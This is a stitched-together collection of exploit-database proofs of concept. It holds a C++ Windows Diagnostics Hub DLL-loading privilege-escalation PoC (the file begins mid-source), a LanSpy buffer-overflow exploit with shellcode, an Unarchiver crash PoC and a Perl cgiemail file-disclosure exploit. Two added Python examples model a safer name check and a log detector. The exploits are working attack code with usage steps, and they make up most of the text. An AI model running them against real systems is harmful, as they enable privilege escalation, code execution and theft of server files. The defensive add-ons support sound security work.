class __declspec(uuid("0d8af6b7-efd5-4f6d-a834-314740ab8caa")) IStandardCollectorService : public IUnknown
{
public:
virtual HRESULT __stdcall CreateSession(SessionConfiguration *, IStandardCollectorClientDelegate *, ICollectionSession **) = 0;
virtual HRESULT __stdcall GetSession(REFGUID, ICollectionSession **) = 0;
virtual HRESULT __stdcall DestroySession(REFGUID) = 0;
virtual HRESULT __stdcall DestroySessionAsync(REFGUID) = 0;
virtual HRESULT __stdcall AddLifetimeMonitorProcessIdForSession(REFGUID, int) = 0;
};
_COM_SMARTPTR_TYPEDEF(IStandardCollectorService, __uuidof(IStandardCollectorService));
_COM_SMARTPTR_TYPEDEF(ICollectionSession, __uuidof(ICollectionSession));
class CoInit
{
public:
CoInit() {
CoInitialize(nullptr);
}
~CoInit() {
CoUninitialize();
}
};
void ThrowOnError(HRESULT hr)
{
if (hr != 0)
{
throw _com_error(hr);
}
}
int wmain(int argc, wchar_t** argv)
{
if (argc < 2)
{
printf("poc path\\to\\dll\n");
return 1;
}
CoInit coinit;
try
{
GUID name;
CoCreateGuid(&name);
LPOLESTR name_str;
StringFromIID(name, &name_str);
WCHAR random_name[MAX_PATH];
StringCchPrintf(random_name, MAX_PATH, L"tasks:%ls.dll", name_str);
WCHAR target[MAX_PATH];
GetSystemDirectory(target, MAX_PATH);
StringCchCat(target, MAX_PATH, L"\\");
StringCchCat(target, MAX_PATH, random_name);
WCHAR valid_dir[MAX_PATH];
GetModuleFileName(nullptr, valid_dir, MAX_PATH);
WCHAR* p = wcsrchr(valid_dir, L'\\');
*p = 0;
StringCchCat(valid_dir, MAX_PATH, L"\\etw");
CreateDirectory(valid_dir, nullptr);
if (!CopyFile(argv[1], target, FALSE))
{
printf("Error copying file %d\n", GetLastError());
return 1;
}
IStandardCollectorServicePtr service;
ThrowOnError(CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service)));
DWORD authn_svc;
DWORD authz_svc;
LPOLESTR principal_name;
DWORD authn_level;
DWORD imp_level;
RPC_AUTH_IDENTITY_HANDLE identity;
DWORD capabilities;
ThrowOnError(CoQueryProxyBlanket(service, &authn_svc, &authz_svc, &principal_name, &authn_level, &imp_level, &identity, &capabilities));
ThrowOnError(CoSetProxyBlanket(service, authn_svc, authz_svc, principal_name, authn_level, RPC_C_IMP_LEVEL_IMPERSONATE, identity, capabilities));
SessionConfiguration config = {};
config.version = 1;
config.monitor_pid = ::GetCurrentProcessId();
CoCreateGuid(&config.guid);
bstr_t path = valid_dir;
config.path = path;
ICollectionSessionPtr session;
ThrowOnError(service->CreateSession(&config, nullptr, &session));
GUID agent_guid;
CoCreateGuid(&agent_guid);
ThrowOnError(session->AddAgent(random_name, agent_guid));
}
catch (const _com_error& error)
{
if (error.Error() == 0x8007045A)
{
printf("DLL should have been loaded\n");
}
else
{
printf("%ls\n", error.ErrorMessage());
printf("%08X\n", error.Error());
}
}
return 0;
}
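An added example, written here in Python and not part of the report or its PoC, modelling the agent-name validation the report recommends: the parent-directory check on its own accepts an alternate-data-stream name such as tasks:abc.dll, while a check for invalid path characters rejects it. SYSTEM32 is a constructed value and the function names are hypothetical; paths are handled with ntpath so the model runs on any platform.

```python
"""Model of the two agent-name checks discussed in the Diagnostics Hub report.

Added example, not code from the report or from the collector service. The
file-system side is modelled on strings only (ntpath), so nothing here touches
a real system32 directory.
"""
import ntpath

SYSTEM32 = r"C:\Windows\System32"  # constructed value for the example

# Characters Windows forbids in file names. ':' is the important one here:
# it also introduces an NTFS alternate data stream ("tasks:abc.dll").
_INVALID_CHARS = set('<>:"/\\|?*') | {chr(c) for c in range(32)}
_RESERVED = ({"CON", "PRN", "AUX", "NUL"}
             | {"COM%d" % i for i in range(1, 10)}
             | {"LPT%d" % i for i in range(1, 10)})


def directory_check_only(agent_name, system32=SYSTEM32):
    """The weak check: join the name to system32 and accept it if the
    resulting path still has system32 as its parent directory.

    An ADS name contains no separator, so "tasks:abc.dll" resolves to
    system32\\tasks:abc.dll and passes, even though the stream actually
    lives on the user-writable tasks directory.
    """
    full = ntpath.normpath(ntpath.join(system32, agent_name))
    return ntpath.dirname(full).lower() == system32.lower()


def validate_agent_name(agent_name, system32=SYSTEM32):
    """Hardened check: the agent must be a bare, well-formed .dll file name.

    Returns (True, resolved_path) or (False, reason).
    """
    if not agent_name or len(agent_name) > 255:
        return False, "empty or too long"
    bad = sorted({c for c in agent_name if c in _INVALID_CHARS})
    if bad:
        return False, "invalid character(s): " + ", ".join(repr(c) for c in bad)
    if agent_name in {".", ".."} or agent_name.endswith((" ", ".")):
        return False, "relative component or trailing space/dot"
    if agent_name.split(".")[0].upper() in _RESERVED:
        return False, "reserved device name"
    if not agent_name.lower().endswith(".dll"):
        return False, "not a .dll"
    # With separators and ':' already rejected, this final check is belt and
    # braces: the name can only resolve to a direct child of system32.
    full = ntpath.normpath(ntpath.join(system32, agent_name))
    if ntpath.dirname(full).lower() != system32.lower():
        return False, "resolves outside system32"
    return True, full


if __name__ == "__main__":
    for name in ("agent.dll", "tasks:abc.dll", "..\\evil.dll", "nul.dll"):
        print("%-16s directory check: %-5s hardened: %s"
              % (name, directory_check_only(name), validate_agent_name(name)))
```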
#!/usr/bin/python
### LanSpy 2.0.0.155 - Buffer Overflow Exploit by n30m1nd ###
# Date: 2016-10-18
# Exploit Author: n30m1nd
# Vendor Homepage: www.lantricks.com
# Software Link: https://www.exploit-db.com/apps/42114d0f9e88ad76acaa0f145dabf923-lanspy_setup.exe
# Version: LanSpy 2.0.0.155
# Tested on: Win7 32bit and Win10 64 bit
# Platforms
# =========
# Tested on Win7 32bit and Win10 64 bit
# This exploit should work everywhere since the binary does not implement DEP nor ASLR
# Credits
# =======
# Shouts to hyp3rlinx for the PoC:
# https://www.exploit-db.com/exploits/38399/
# http://hyp3rlinx.altervista.org/
# And shouts to the crew at Offensive Security for their huge efforts on making
# the infosec community better
# How to
# ======
# * Run this python script. It will generate an "addresses.txt" file.
# * Replace this file in the root directory of your LanSpy.exe installation.
# * Run LanSpy.exe and start the scan or do so by pressing F3.
# - You can also call LanSpy.exe from the command line like the following and
# it will run the exploit straight away: echo n30 | C:\Path\To\LanSpy.exe
# Exploit code
# ============
import struct
# 32bit Alphanum-ish shellcodes
# Bad chars detected: 00 2d 20
# MessageBoxA at => 00404D80
msgbox_shellcode = (
"\x31\xC0\x50\x68"
"\x70\x77\x6E\x64"
"\x54\x5F\x50\x57"
"\x57\x50\x35\xC4"
"\x80\x80\x55\x35"
"\x44\xCD\xC0\x55"
"\x50\xC3"
)
# WinExec at -> 004EC4FF
calc_shellcode = (
"\x31\xC0\x50\x68"
"\x63\x61\x6C\x63"
"\x54\x5F\x50\x57"
"\x35\xC3\x4E\xC3"
"\x55\x35\x3C\x8A"
"\x8D\x55\x50\xC3"
)
# Change the shellcode to be used here
scde = calc_shellcode
#scde = msgbox_shellcode
# 126 are the bytes to jmp back with opcode \x74\x80 => ja -80h and it is where our shellcode resides
junk = 'A'*(676-126)
if len(scde) > 126:
    exit("[e] Shellcode is too big! Egghunter maybe? ;)")
# 0040407D => jmp ecx inside LanSpy
jecx = 'A'*(126-len(scde))+'\x74\x80CC'+struct.pack('<I', 0x0040407D)
# Junk + Shellcode for calc + jump to our first stage jump which jumps to the second stage calc shellcode
payl = junk + scde + jecx
with open("addresses.txt", "wb") as f:
    f.write(payl)
# Exploit Title: The Unarchiver 3.11.1 '.tar.Z' Local Crash PoC
# Date: 10-17-2016
# Exploit Author: Antonio Z.
# Vendor Homepage: http://unarchiver.c3.cx/unarchiver
# Software Link: http://unarchiver.c3.cx/downloads/TheUnarchiver3.11.1.zip
# Version: 3.11.1
# Tested on: OS X 10.10, OS X 10.11, OS X 10.12
# More information: https://opensource.apple.com/source/gnuzip/gnuzip-11/gzip/lzw.h
import os, struct, sys, shutil
from mmap import mmap
if len(sys.argv) <= 1:
    print "Usage: python Local_Crash_PoC.py [file name]"
    exit()
file_name = sys.argv[1]
def get_extension(file_name):
    basename = os.path.basename(file_name)
    extension = '.'.join(basename.split('.')[1:])
    # return '' rather than None so the name concatenation below cannot fail
    return '.' + extension if extension else ''
def file_maping():
    # byte 2 of a .Z header holds the LZW flags/max-bits field (see lzw.h);
    # writing 0xFF there gives an out-of-range max-bits value with block mode set
    maping = mmap(file_mod.fileno(), 0)
    maping.seek(2)
    maping.write_byte(struct.pack('B', 255))
    maping.close()
new_file_name = "Local_Crash_PoC" + get_extension(file_name)
# copy synchronously; os.popen('cp ...') could return before the copy had finished
shutil.copyfile(file_name, new_file_name)
file_mod = open(new_file_name, 'r+b')
file_maping()
file_mod.close()
print '[+] ' + 'Created file: ' + new_file_name
#!/usr/bin/env perl
# Exploit Title: cgiemail local file inclusion
# Vendor Homepage: http://web.mit.edu/wwwdev/cgiemail/webmaster.html
# Software Link: http://web.mit.edu/wwwdev/cgiemail/cgiemail-1.6.tar.gz
# Version: 1.6 and older
# Date: 2016-09-27
# cgiecho a script included with cgiemail will return any file under a
# websites document root if the file contains square brackets and the text
# within the brackets is guessable.
# cgiemail is currently shipped with cPanel and is enabled by default.
# Example: http://hostname/cgi-sys/cgiecho/login.php?'pass'=['pass']
# will display http://hostname/login.php if login.php contains $_POST['pass']
##
# cgiemail local file inclusion exploit
# Author: Finbar Crago <finbar.crago@gmail.com>
# https://github.com/finbar-crago/cgiemail-exploit
##
use strict;
use warnings;
use POSIX;
use LWP::UserAgent;
use HTML::Entities;
use Getopt::Long;
$|++; $\="\n"; $,=" ";
sub usage {
die <<"EOF";
cgiemail local file inclusion exploit
Usage: $0 [options] target
Options:
--names Check for names in comma separated list
--num Check for numbers
--num-max Maximum number to check (default 10)
--batch Number of arguments sent per request (default 10)
--cgiecho-path Path of cgiecho on server (default '/cgi-sys/cgiecho/')
--user-agent Set user-agent (default 'Mozilla/5.0')
--deley Pause between requests in seconds (default 1)
--timeout Set connection timeout (default 10)
Example:
$0 --num --names 'email,password' http://hostname/login.php > login.php
EOF
}
my $names;
my $num = 0;
my $num_max = 10;
my $batch = 10;
my $cgiecho_path = '/cgi-sys/cgiecho';
my $user_agent = 'Mozilla/5.0';
my $timeout = 10;
my $deley = 1;
GetOptions(
'names=s' => \$names,
'num' => \$num,
'num-max=i' => \$num_max,
'batch=i' => \$batch,
'cgiecho-path=s' => \$cgiecho_path,
'user-agent=s' => \$user_agent,
'deley=i' => \$deley,
'timeout=i' => \$timeout,
);
usage unless
defined $ARGV[0] &&
$ARGV[0] =~ m|^(https?://)?([a-z\d.-]+)/?(.*)?|i;
my $conn=$1||'http://';my $host=$2;my $path=$3||'index.php';
my $url = "$conn$host/$cgiecho_path/$path";
my @list= ();
if($num){ push @list, $_ for 0..$num_max }
if($names){
push @list, "%22$_%22","%27$_%27" for split/,/,$names;
}
my $ua = LWP::UserAgent->new;
$ua->agent($user_agent);
$ua->timeout($timeout);
$batch--;
my $i=0;
my $end = ceil($#list/$batch);
while($#list+1){
my $args='?';
my $to = ($#list > $batch)?$batch:$#list;
$args.="$_=[$_]&" for @list[0..$to];
@list = @list[$to+1..$#list];
my $res = $ua->get($url.$args);
die $res->status_line if !$res->content_is_html;
my $html = $res->decoded_content;
if($html !~ />cgiemail[\n\r ]*([\d.]+)/){
print "cgiemail not found" if !$i;
print "cgiemail was here but now it's not..." if $i;
exit -1;
} print STDERR "detected cgiemail $1" if !$i;
print STDERR "\e[Jrequest ".++$i." of $end...";
if($res->code == 200){
$html =~ m|<PRE>(.+)</PRE>|s;
print decode_entities($1);
print STDERR "success!";
exit;
}
if($res->code == 500){
if($html =~ m|500 Could not open template - No such file or directory|){
print STDERR "the file /$path doesn't exist...";
}
elsif($html =~ m|500 Empty template file|){
print STDERR "/$path is a directory...";
}
else{
print STDERR "unknown 500 error:";
print STDERR $html;
}
exit -1;
}
select(undef,undef,undef,$deley); printf "\eM";
}
print STDERR "sorry, no match found for $path";
exit -1;
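An added example, not part of the exploit above, from the defender's side: it scans web server access logs for the request shape the exploit sends (a file under the cgiecho path requested with bracketed placeholder arguments) and marks HTTP 200 answers as likely template disclosures, using the 200/500 meaning the exploit itself relies on. The log lines are constructed and the function names are hypothetical.

```python
"""Detect cgiecho template-disclosure probes in Apache combined-format logs.

Added example (not from the cgiemail advisory or exploit). The sample lines
are constructed; the first two mirror the request shape the exploit sends.
"""
import re
from urllib.parse import parse_qsl, urlsplit

SAMPLE_LOG = """\
203.0.113.5 - - [27/Sep/2016:10:01:02 +0000] "GET /cgi-sys/cgiecho/login.php?'pass'=['pass']&'user'=['user'] HTTP/1.1" 200 812 "-" "Mozilla/5.0"
203.0.113.5 - - [27/Sep/2016:10:01:03 +0000] "GET /cgi-sys/cgiecho/config.php?0=%5B0%5D&1=%5B1%5D HTTP/1.1" 500 331 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Sep/2016:10:02:00 +0000] "GET /contact.html HTTP/1.1" 200 400 "-" "Mozilla/5.0"
198.51.100.7 - - [27/Sep/2016:10:02:01 +0000] "POST /cgi-sys/cgiemail/contact.txt HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# cgiecho substitutes [name] placeholders in the template with the matching
# query argument; the exploit sends name=[name] so the file echoes itself.
PLACEHOLDER_RE = re.compile(r"\[([^\]]*)\]")


def parse_line(line):
    """Split one combined-format line into its fields, or None if malformed."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_cgiecho_probes(log_text):
    """Return one finding per request that asks cgiecho to render a file
    with bracketed placeholder arguments."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        if "/cgiecho/" not in parts.path:
            continue
        probed = []
        # parse_qsl percent-decodes, so %5B0%5D is seen as [0]
        for _name, value in parse_qsl(parts.query, keep_blank_values=True):
            probed.extend(PLACEHOLDER_RE.findall(value))
        if not probed:
            continue
        findings.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "template": parts.path.split("/cgiecho/", 1)[1],
            "probed_names": probed,
            "status": int(rec["status"]),
            # cgiecho returns 200 with the rendered template when the file
            # exists and 500 when it does not, so a 200 most likely means
            # the file's contents went back to the client.
            "likely_disclosed": rec["status"] == "200",
        })
    return findings


if __name__ == "__main__":
    for f in find_cgiecho_probes(SAMPLE_LOG):
        print("%s %s probed %s via %s -> %d%s" % (
            f["time"], f["ip"], f["probed_names"], f["template"], f["status"],
            " (likely disclosed)" if f["likely_disclosed"] else ""))
```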